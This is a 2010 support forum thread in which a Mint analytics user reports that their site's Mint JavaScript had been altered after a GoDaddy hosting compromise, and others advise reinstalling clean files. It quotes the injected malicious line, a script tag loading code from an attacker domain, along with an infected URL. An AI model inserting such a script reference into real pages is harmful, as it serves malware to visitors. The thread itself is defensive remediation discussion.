Login to download the latest version of Mint and your favorite Pepper, purchase additional licenses, or post in the Forum. Don't have an account? Create one!

In Partnership with Media Temple

Mint Forum

Malware inserted into mint js?

KSC
Minted
Posted on Jun 09, '10 at 10:11 pm

First off, let me just say I know this has nothing to do with Mint. I’ve had it running on my site for some time now without incident. Also, I don’t wish to presume that a matter such as this would be categorized as a legitimate support issue. If that is indeed the case, I understand and apologize.

I just wanted to give a heads up to any other users out there who were unfortunate enough to chose Godaddy as their hosting service. If you don’t already know, last month Godaddy were hit by multiple attacks. You can read about them below. http://blog.sucuri.net/2010/05/here-we- … inues.html

My PHP based forum was hit and had to be completely purged. Thankfully, since my coding skills are horribly archaic, my HTML remained unscathed, or so I thought. Today one of my readers informed me that his A/V software flagged one of my HTML based pages. He provided me with the following link: PLEASE DON’T CLICK THIS ON A WINDOWS BASED MACHINE!!! http://crowsxworst.com/mint/?js

Upon closer inspection I noticed the following line of code at the end of the page: };Mint.save…script src=”http://holasionweb.com/oo.php”

Holasion.com were the ones responsible for these previously mentioned attacks. My question is, how the hell is this even possible?! It must have been inserted somewhere into the Mint directory, right? I reviewed a sample of my site’s pages after the attack to be certain it hadn’t been affected, but I never saw anything out of the ordinary. That mint java script looks completely banal on the surface. Or is it? To be honest, it’s been so long since I installed Mint, I don’t remember the exact snippet.

If there’s a way to quickly delete this without having to remove the mint js from every page, I’d love to know. If nothing else, maybe someone could tell me if that page I provided above is normal except for the final line with the attackers website?

Thank you for your time.

Shaun Inman
Mint/Pepper Developer
Posted on Jun 10, '10 at 10:52 am

Most malware injects code to any index.(html|php|etc) file indiscriminately. If your server was exploited you should delete all compromised files and replace them with pre-exploit versions or in the case of Mint and its Pepper, download fresh copies from the Peppermill.

KSC
Minted
Posted on Jun 10, '10 at 12:09 pm

I understand that. I was just confused as to how this code was being executed. When I cleaned the forum I could physically SEE the line of malicious code inserted in config.php. Had I not been using a text editor that distinguished urls and images from other code, I would never have caught this. Upon closer inspection of index.php in my mint directory, I’m still not seeing the attack point. I guess I just don’t really have a grasp as to how the injection actually works. I won’t ask you to elaborate.

So, are you suggesting that I delete the entire mint directory and start from scratch? I won’t actually have to remove the .js from individual page headers?

MacManX
Minted
Posted on Jun 13, '10 at 05:30 pm

I believe that the Mint files were infected, since the current malware that is hitting GoDaddy indiscriminately injects code into all .php files. The infected Mint is probably displaying what you’re seeing as part of the inclusion of /mint/?js on the pages.

In other words, if you clean Mint (and all other .php files), you should be fine. And in most cases, like with Mint for example, you should be able to just re-install the files (it sure beats tediously cleaning every single line of code).

KSC
Minted
Posted on Jun 16, '10 at 10:12 am

Gotcha. With the forum I simply deleted all .php files then reinstalled. As I said, I’m a (horrible) “90’s coder”, so I assumed the main site was unaffected being html. I completely forgot about Mint.

After being alerted to this issue, I renamed my mint directory in order to keep readers safe. Now I can go about fixing it the proper way. I guess I’ll lose all my previous stats, but that’s not the end of the world.

Thank you for your help. I appreciate it.

MacManX
Minted
Posted on Jun 16, '10 at 01:52 pm

You’re welcome!

As long as you leave the database in tact, you won’t lose your stats. Just replace the files and all should be well.

You must be logged in to reply. Login above or create an account